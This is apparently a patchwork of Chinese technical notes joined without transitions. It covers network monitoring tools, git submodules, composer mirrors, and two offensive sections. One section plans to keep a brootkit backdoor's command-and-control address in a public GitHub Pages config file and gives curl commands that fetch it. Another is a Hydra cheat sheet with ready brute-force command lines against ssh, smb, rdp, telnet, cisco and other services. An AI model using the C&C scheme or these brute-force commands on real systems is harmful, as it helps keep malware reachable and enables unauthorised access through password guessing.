有三个命令vnstat、iftop、nethogs（推荐）

都需要额外安装软件 使用yum或apt-get

一、vnstat使用，查看接口统计报告

vnstat -i eth0 -l #实时流量情况

还有其他命令使用--help查看

ctrl+c结束后，会显示监控期间的流量统计结果

二、iftop使用，检查带宽使用情况

iftop可以用来监控网卡的实时流量（可以指定网段）、反向解析IP、显示端口信息等

命令用法：

-i设定监测的网卡，如：# iftop -i eth1

-B 以bytes为单位显示流量(默认是bits)，如：# iftop -B

-n使host信息默认直接都显示IP，如：# iftop -n

-N使端口信息默认直接都显示端口号，如: # iftop -N

交互命令：

按n切换显示本机的IP或主机名;

按s切换是否显示本机的host信息;

按d切换是否显示远端目标主机的host信息;

按t切换显示格式为2行/1行/只显示发送流量/只显示接收流量;

按N切换显示端口号或端口服务名称;

按S切换是否显示本机的端口信息;

按D切换是否显示远端目标主机的端口信息;

按p切换是否显示端口信息;

使用截图：

三、nethogs使用，按进程实时统计网络带宽利用率(推荐)

命令用法：

1、设置5秒钟刷新一次，通过-d来指定刷新频率：nethogs -d 5

2、监视eth0网络带宽 :nethogs eth0

3、同时监视eth0和eth1接口 : nethogs eth0 eth1
交互命令：
以下是NetHogs的一些交互命令(键盘快捷键)
m : 修改单位
r : 按流量排序
s : 按发送流量排序
q : 退出命令提示符

使用截图：

目标

后期为项目做准备，想处理一些信息的转换。在brootkit中重新处理远程地址，因为有些后门要固定信息，直接写ip或者域名不怎么好，想到利用github.io的形式来处理C&C服务器的信息，比如C&C的ip或者域名随时更改直接放到github的配置文件中，所有信息只需要读取一个公共的github项目就可以再次解析出远程服务器的相关信息。

curl 参数

-A/--user-agent <string>              设置用户代理发送给服务器
-b/--cookie <name=string/file>    cookie字符串或文件读取位置
-c/--cookie-jar <file>                    操作结束后把cookie写入到这个文件中
-C/--continue-at <offset>            断点续转
-D/--dump-header <file>              把header信息写入到该文件中
-e/--referer                                  来源网址
-f/--fail                                          连接失败时不显示http错误
-o/--output                                  把输出写到该文件中
-O/--remote-name                      把输出写到该文件中，保留远程文件的文件名
-r/--range <range>                      检索来自HTTP/1.1或FTP服务器字节范围
-s/--silent                                    静音模式。不输出任何东西
-T/--upload-file <file>                  上传文件
-u/--user <user[:password]>      设置服务器的用户和密码
-w/--write-out [format]                什么输出完成后
-x/--proxy <host[:port]>              在给定的端口上使用HTTP代理
-#/--progress-bar                        进度条显示当前的传送状态

-w 具体的参数可到 别人的博客园 里获得。

curl 获取状态码

curl -I -m 10 -o /dev/null -s -w %{http_code} https://elf-all.github.io/config/callback_port.conf

· -I 仅测试HTTP头
· -m 10 最多查询10s
· -o /dev/null 屏蔽原有输出信息
· -s silent 模式，不输出任何东西
· -w %{http_code} 控制额外输出

这样直接返回其文件的状态码，如果是404则是访问失败，可能项目配置文件的地址已更换，如果是200的话就可进行下一步了

curl 获取结果

curl https://elf-all.github.io/config/callback_port.conf

直接获取文件内容，就等待其他的处理。

背景

项目中经常使用别人维护的模块，在git中使用子模块的功能能够大大提高开发效率。

使用子模块后，不必负责子模块的维护，只需要在必要的时候同步更新子模块即可。

本文主要讲解子模块相关的基础命令，详细使用请参考man page。

子模块的添加

添加子模块非常简单，命令如下：

git submodule add <url> <path>

其中，url为子模块的路径，path为该子模块存储的目录路径。

执行成功后，git status会看到项目中修改了.gitmodules，并增加了一个新文件（为刚刚添加的路径）

git diff --cached查看修改内容可以看到增加了子模块，并且新文件下为子模块的提交hash摘要

git commit提交即完成子模块的添加

子模块的使用

克隆项目后，默认子模块目录下无任何内容。需要在项目根目录执行如下命令完成子模块的下载：

git submodule init
git submodule update

或：

git submodule update --init --recursive

执行后，子模块目录下就有了源码，再执行相应的makefile即可。

子模块的更新

子模块的维护者提交了更新后，使用子模块的项目必须手动更新才能包含最新的提交。

在项目中，进入到子模块目录下，执行 git pull更新，查看git log查看相应提交。

完成后返回到项目目录，可以看到子模块有待提交的更新，使用git add，提交即可。

删除子模块

有时子模块的项目维护地址发生了变化，或者需要替换子模块，就需要删除原有的子模块。

删除子模块较复杂，步骤如下：

rm -rf 子模块目录 删除子模块目录及源码
vi .gitmodules 删除项目目录下.gitmodules文件中子模块相关条目
vi .git/config 删除配置项中子模块相关条目
rm .git/module/* 删除模块下的子模块目录，每个子模块对应一个目录，注意只删除对应的子模块目录即可
执行完成后，再执行添加子模块命令即可，如果仍然报错，执行如下：

git rm --cached 子模块名称

完成删除后，提交到仓库即可。

Hydra

Hydra是一款很强大的暴力破解工具，由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具，主要目的是：展示安全研究人员从远程获取一个系统认证权限。

常见参数

-R：继续从上一次进度接着破解
-S：大写，采用SSL链接
-s  <PORT>：小写，可通过这个参数指定非默认端口
-l  <LOGIN>：指定破解的用户，对特定用户破解
-L  <FILE>：指定用户名字典
-p  <PASS>：小写，指定密码破解，少用，一般是采用密码字典
-P  <FILE>：大写，指定密码字典
-e  <ns>：可选选项，n：空密码试探，s：使用指定用户和密码试探
-C  <FILE>：使用冒号分割格式，例如“登录名:密码”来代替 -L/-P 参数
-M  <FILE>：指定目标列表文件一行一条
-o  <FILE>：指定结果输出文件
-f ：在使用-M参数以后，找到第一对登录名或者密码的时候中止破解
-t <TASKS>：同时运行的线程数，默认为16
-w <TIME>：设置最大超时的时间，单位秒，默认是30s
-v / -V：显示详细过程
server：目标ip
service：指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
OPT：可选项

命令示例

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 10.96.10.252 ssh   #-L指定用户字典 -P 指定密码字典  -o把成功的输出到ssh.txt文件 -vV显示详细信息

后面参数是网页中对应的表单字段的name 属性，后面<title>中的内容是表示错误猜解的返回信息提示，可以自定义。

破解https：

• hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

破解teamspeak：

• hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco：

• hydra -P pass.txt 10.36.16.18 cisco
• hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb：

• hydra -l administrator -P pass.txt 10.36.16.18 smb

破解pop3：

• hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp：

• hydra ip rdp -l administrator -P pass.txt -V

破解http-proxy：

• hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap：

• hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
• hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解telnet

• hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
  

将源设置为国内镜像

composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/

# 取消全局配置
composer config -g --unset repos.packagist